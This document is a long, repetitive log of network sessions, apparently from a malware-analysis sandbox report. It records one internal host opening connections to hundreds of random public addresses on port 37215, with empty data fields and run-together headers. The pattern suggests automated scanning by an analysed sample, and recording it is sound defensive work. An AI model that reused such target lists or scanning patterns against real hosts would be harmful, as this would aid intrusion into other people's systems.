                                                                            4292192.168.2.1536366197.231.144.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4293192.168.2.1558432197.175.192.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4294192.168.2.1556204197.186.158.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4295192.168.2.1553356197.228.92.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4296192.168.2.1533716197.89.76.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4297192.168.2.1547526197.117.171.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4298192.168.2.1556242197.9.50.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4299192.168.2.1553212197.50.84.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4300192.168.2.1535816197.107.159.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4301192.168.2.1548864197.234.61.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4302192.168.2.1541592197.166.12.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4303192.168.2.1555498197.77.66.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4304192.168.2.1547172197.241.38.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4305192.168.2.1551620197.213.158.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4306192.168.2.1542458197.189.161.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4307192.168.2.1538460197.78.215.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4308192.168.2.1535210197.88.89.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4309192.168.2.1546904197.63.172.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4310192.168.2.1553868197.134.43.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4311192.168.2.1550874197.225.184.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4312192.168.2.1552552197.101.9.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4313192.168.2.1544646197.225.65.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4314192.168.2.1543712197.41.11.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4315192.168.2.1544820197.102.147.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4316192.168.2.1556204197.160.107.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4317192.168.2.1559814197.167.73.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4318192.168.2.1544996197.141.239.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4319192.168.2.1548194197.193.223.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4320192.168.2.1541580197.43.101.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4321192.168.2.1534428197.34.230.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4322192.168.2.1533202197.255.55.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4323192.168.2.1539366197.148.73.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4324192.168.2.1545246197.36.161.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4325192.168.2.1542680197.95.94.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4326192.168.2.1538162197.146.230.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4327192.168.2.1534414197.13.23.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4328192.168.2.1544462197.230.177.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4329192.168.2.1559418197.89.10.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4330192.168.2.1550434197.213.102.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4331192.168.2.1555786197.13.85.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4332192.168.2.1560872197.74.203.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4333192.168.2.1548440197.98.188.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4334192.168.2.1534170197.101.113.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4335192.168.2.1552770197.115.20.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4336192.168.2.1557582197.57.114.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4337192.168.2.1549260197.106.90.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4338192.168.2.1533328197.104.71.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4339192.168.2.1541386197.236.232.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4340192.168.2.1559784197.56.170.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4341192.168.2.1533252197.4.157.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4342192.168.2.1533586197.202.144.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4343192.168.2.1550122197.133.254.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4344192.168.2.1547930197.113.154.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4345192.168.2.1533934197.3.54.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4346192.168.2.1538896197.51.223.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4347192.168.2.1551344197.8.140.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4348192.168.2.1554360197.65.209.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4349192.168.2.1548842197.221.47.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4350192.168.2.1550884197.8.197.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4351192.168.2.1557838197.211.214.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4352192.168.2.1550792197.181.233.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4353192.168.2.1549578197.70.248.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4354192.168.2.1540330197.34.73.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4355192.168.2.1538394197.127.227.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4356192.168.2.1557672197.72.219.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4357192.168.2.1555646197.196.214.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4358192.168.2.1549864197.119.130.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4359192.168.2.1548002197.120.96.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4360192.168.2.1550938197.66.179.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4361192.168.2.1540648197.74.223.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4362192.168.2.1560288197.60.51.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4363192.168.2.1559698197.63.171.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4364192.168.2.1544320197.252.204.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4365192.168.2.1551030197.169.121.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4366192.168.2.1534120197.133.20.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4367192.168.2.1558878197.210.2.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4368192.168.2.1548384197.114.121.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4369192.168.2.1551432197.185.168.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4370192.168.2.1533092197.44.21.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4371192.168.2.1556222197.68.255.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4372192.168.2.1558448197.41.165.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4373192.168.2.1542206197.17.111.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4374192.168.2.1537946197.169.197.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4375192.168.2.1541052197.101.117.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4376192.168.2.1553678197.175.82.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4377192.168.2.1556364197.146.212.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4378192.168.2.1538454197.177.126.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4379192.168.2.1535842197.47.153.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4380192.168.2.1545824197.85.103.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4381192.168.2.155746841.164.246.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4382192.168.2.153563241.171.55.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4383192.168.2.155990441.98.190.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4384192.168.2.153878841.226.87.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4385192.168.2.155393241.168.51.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4386192.168.2.155084441.59.200.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4387192.168.2.154973841.115.86.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4388192.168.2.154927641.88.98.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4389192.168.2.155040441.73.154.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4390192.168.2.155930041.147.228.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4391192.168.2.154304241.68.182.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4392192.168.2.156017841.196.149.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4393192.168.2.155827641.50.59.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4394192.168.2.154545241.176.92.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4395192.168.2.153732841.162.11.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4396192.168.2.154149841.142.87.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4397192.168.2.155977441.131.78.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4398192.168.2.155234041.95.20.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4399192.168.2.154574841.78.47.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4400192.168.2.155349641.4.75.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4401192.168.2.153761241.199.195.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4402192.168.2.155316441.96.36.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4403192.168.2.153817641.48.179.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4404192.168.2.153564841.66.105.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4405192.168.2.153488041.180.243.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4406192.168.2.154278241.189.10.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4407192.168.2.153762241.26.115.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4408192.168.2.155314241.52.152.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4409192.168.2.155663841.52.109.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4410192.168.2.154341441.107.184.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4411192.168.2.155632641.219.34.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4412192.168.2.153947241.197.170.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4413192.168.2.155645041.191.144.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4414192.168.2.155354241.43.176.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4415192.168.2.153426441.114.110.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4416192.168.2.153351041.77.9.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4417192.168.2.155609041.255.254.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4418192.168.2.153634841.106.78.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4419192.168.2.154839241.66.210.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4420192.168.2.154696841.18.22.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4421192.168.2.153735641.238.87.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4422192.168.2.154069641.176.217.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4423192.168.2.155062241.144.44.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4424192.168.2.154435241.20.131.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4425192.168.2.154855641.56.204.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4426192.168.2.154341841.100.128.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4427192.168.2.154960041.76.30.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4428192.168.2.154088041.70.28.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4429192.168.2.155007841.171.242.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4430192.168.2.155426241.210.226.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4431192.168.2.154989041.51.147.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4432192.168.2.153930641.243.8.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4433192.168.2.155197041.33.241.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4434192.168.2.155147841.43.209.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4435192.168.2.155387041.95.6.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4436192.168.2.154402641.129.249.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4437192.168.2.154524041.106.221.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4438192.168.2.155478041.84.116.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4439192.168.2.153959841.135.132.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4440192.168.2.155933841.144.57.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4441192.168.2.155150641.40.64.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4442192.168.2.153731841.112.53.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4443192.168.2.153735041.97.6.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4444192.168.2.154188841.100.91.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4445192.168.2.155588641.198.106.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4446192.168.2.153444041.86.106.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4447192.168.2.155657441.48.125.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4448192.168.2.156078241.15.57.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4449192.168.2.155526241.127.34.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4450192.168.2.153552241.95.160.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4451192.168.2.154728041.73.14.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4452192.168.2.155390641.36.102.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4453192.168.2.155883441.0.247.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4454192.168.2.155312441.51.154.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4455192.168.2.154286241.61.42.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4456192.168.2.155376641.140.42.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4457192.168.2.154621441.124.175.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4458192.168.2.154184641.117.153.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4459192.168.2.155328241.245.124.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4460192.168.2.154254241.89.142.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4461192.168.2.154658041.100.231.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4462192.168.2.153290041.79.68.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4463192.168.2.155068441.148.192.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4464192.168.2.155899441.84.89.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4465192.168.2.153533641.155.30.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4466192.168.2.155146241.197.236.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4467192.168.2.155728641.177.3.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4468192.168.2.155019441.65.196.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4469192.168.2.153278841.66.226.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4470192.168.2.153835241.1.195.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4471192.168.2.154918841.110.100.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4472192.168.2.153488041.57.91.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4473192.168.2.153777441.105.159.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4474192.168.2.154845041.35.20.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4475192.168.2.155937241.87.210.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4476192.168.2.154338041.17.30.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4477192.168.2.155573841.240.46.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4478192.168.2.155849441.85.185.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4479192.168.2.154325041.173.179.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4480192.168.2.153649241.51.86.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4481192.168.2.156055841.4.159.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4482192.168.2.154031841.91.217.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4483192.168.2.155460041.122.234.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4484192.168.2.154800841.20.83.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4485192.168.2.154344241.94.17.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4486192.168.2.154344041.235.206.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4487192.168.2.155889241.66.226.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4488192.168.2.155334041.167.45.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4489192.168.2.153665641.128.171.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4490192.168.2.153995841.178.53.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4491192.168.2.153682641.234.117.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4492192.168.2.154863041.40.177.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4493192.168.2.153925241.131.103.15837215
